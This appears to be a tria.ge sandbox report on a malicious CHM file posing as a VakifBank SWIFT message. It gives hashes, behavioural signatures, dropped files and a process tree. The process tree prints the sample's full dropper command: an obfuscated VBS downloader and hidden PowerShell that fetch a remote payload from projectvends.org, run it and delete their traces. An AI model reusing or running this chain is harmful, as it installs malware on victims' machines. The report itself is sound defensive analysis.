Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/01/2025, 17:57
Static task
static1
Behavioral task
behavioral1
Sample
VakifBank_Swift_Mesaji.chm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
VakifBank_Swift_Mesaji.chm
Resource
win10v2004-20241007-en
General
-
Target
VakifBank_Swift_Mesaji.chm
-
Size
75KB
-
MD5
039c23eb3b3b9c7a83c8647b6fbbd029
-
SHA1
413a342f9ef90edb0fe4db38d655e6eab77a49ce
-
SHA256
3956166deff9e06982e311687fd916327c004d13af4b3fbd01fb17e93c110591
-
SHA512
4f45ff320239c81535347f66b44b57a74dc445278bc61e6fa25c48792e4fcd0d63f080d420457584c64df81d54c4198f8f84a8e331650cce874a32a0fe6c862e
-
SSDEEP
1536:PTjqBR0MKHC7+qFwItZR3BRRdos7xw9siuUKHj5Cs+0LtpZsAx+9+:7yeMKi7XpZR3BR899svd5ayt7nxf
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2596 powershell.exe 2044 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1864 ript.exe 1284 x.exe -
Loads dropped DLL 4 IoCs
pid Process 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 2576 cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x.exe -
Kills process with taskkill 1 IoCs
pid Process 680 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 ript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 ript.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1284 x.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2596 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 680 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2788 hh.exe 2788 hh.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2788 wrote to memory of 2576 2788 hh.exe 31 PID 2788 wrote to memory of 2576 2788 hh.exe 31 PID 2788 wrote to memory of 2576 2788 hh.exe 31 PID 2576 wrote to memory of 2688 2576 cmd.exe 33 PID 2576 wrote to memory of 2688 2576 cmd.exe 33 PID 2576 wrote to memory of 2688 2576 cmd.exe 33 PID 2576 wrote to memory of 2596 2576 cmd.exe 34 PID 2576 wrote to memory of 2596 2576 cmd.exe 34 PID 2576 wrote to memory of 2596 2576 cmd.exe 34 PID 2596 wrote to memory of 1864 2596 powershell.exe 35 PID 2596 wrote to memory of 1864 2596 powershell.exe 35 PID 2596 wrote to memory of 1864 2596 powershell.exe 35 PID 2576 wrote to memory of 2044 2576 cmd.exe 36 PID 2576 wrote to memory of 2044 2576 cmd.exe 36 PID 2576 wrote to memory of 2044 2576 cmd.exe 36 PID 2044 wrote to memory of 2952 2044 powershell.exe 37 PID 2044 wrote to memory of 2952 2044 powershell.exe 37 PID 2044 wrote to memory of 2952 2044 powershell.exe 37 PID 2576 wrote to memory of 680 2576 cmd.exe 39 PID 2576 wrote to memory of 680 2576 cmd.exe 39 PID 2576 wrote to memory of 680 2576 cmd.exe 39 PID 2952 wrote to memory of 864 2952 cmd.exe 40 PID 2952 wrote to memory of 864 2952 cmd.exe 40 PID 2952 wrote to memory of 864 2952 cmd.exe 40 PID 2952 wrote to memory of 1284 2952 cmd.exe 41 PID 2952 wrote to memory of 1284 2952 cmd.exe 41 PID 2952 wrote to memory of 1284 2952 cmd.exe 41 PID 2952 wrote to memory of 1284 2952 cmd.exe 41
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\VakifBank_Swift_Mesaji.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit2⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\extrac32.exeextrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe3⤵PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd"3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Users\Public\ript.exe"C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1864
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\df.cmd" "4⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\extrac32.exeextrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"5⤵PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\x.exe"C:\Users\Admin\AppData\Local\Temp\x.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1284
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM hh.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD5bbc7fc385a2e1198bc272acb466a70a9
SHA17352a3101f8e53f694fa1af71e57bda25655ce08
SHA2567babe42bb73034aa6b7b9007ad1a07168f3302eba34a4caff6ce9c5f081fa4f5
SHA512033227e1678e5fb3b844e64dfc7974ad76c9ca15d585935e13f7464749feae14319cc3a4406fd79fa0dff553be9f558938d30caecf09503c8c6a4b389eb3dd58
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e8ee4603cf9e0b583582dc275d6c7d13
SHA1fa503eb9e26f6107620f30a91f91a4d6a0708e79
SHA25670b372767492ca7d6b2280a39bfb8d2e1e633e7a84579f162fd4b05f5885bf1e
SHA5122857c163c5de7103b6bb301699705e3abaaaa432ce3012dc36bedcff8b507ecd7e656f9b7094b18b45acfccefb8b0b4688b9dbe76961d2a1c46b3c0bfca762d8
-
Filesize
194B
MD571efa4ec6c67fa5665b1d0c64d60fc25
SHA1f546eda2b94df327b7ad5fa5bb0ba20cd37b2623
SHA25608212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898
SHA5127b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6
-
Filesize
1.1MB
MD5298baf7c77327a1641678b6807c230b4
SHA1e8fd19fcc7722c2a1644478339b3b766bb2a08dc
SHA2568f5897f90faa79aafbcc79d2b0e69a5c4c47ca9b9b55206ec7f293baaafc3b35
SHA51211bda296eafcdf657f0cf9bf8302fcf695a701cbff895cbbd203141be6a41693c9544fa778acd901051f271385c22d1fc87d931de0bcc02e0a9db53822155014
-
Filesize
152KB
MD5791af7743252d0cd10a30d61e5bc1f8e
SHA170096a77e202cf9f30c064956f36d14bcbd8f7bb
SHA256e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15
SHA512d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb